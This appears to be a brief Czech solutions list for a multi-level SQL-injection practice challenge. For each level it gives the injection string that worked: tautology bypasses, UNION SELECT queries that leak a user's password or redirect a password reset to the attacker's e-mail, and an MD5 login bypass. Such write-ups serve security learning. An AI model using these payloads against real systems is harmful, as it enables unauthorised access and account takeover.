LEVEL 1: pass: ' OR '1 Pro další uživatele: ' OR name NOT IN (jména) OR ' (je jich celkem pět :-D) LEVEL 2: lze řešit jako level 1 user: ' OR '1') OR (' Pro další uživatele ' OR name NOT IN (jména)) OR (' LEVEL 3: user: admin' OR '1 LEVEL 4: lze řešit jako level 3 Předpokládám, že lepší by bylo: buď heslo zobrazit pomocí: ' UNION SELECT pass, pass FROM login WHERE name = 'johnwayne nebo podstrčit vlastní e-mail pomocí: UNION SELECT pass, 'my@email.com' FROM login WHERE name = 'johnwayne Bohužel je to obnovení hesla špatně implementované :-( LEVEL 5: user: ' UNION SELECT MD5('') AS '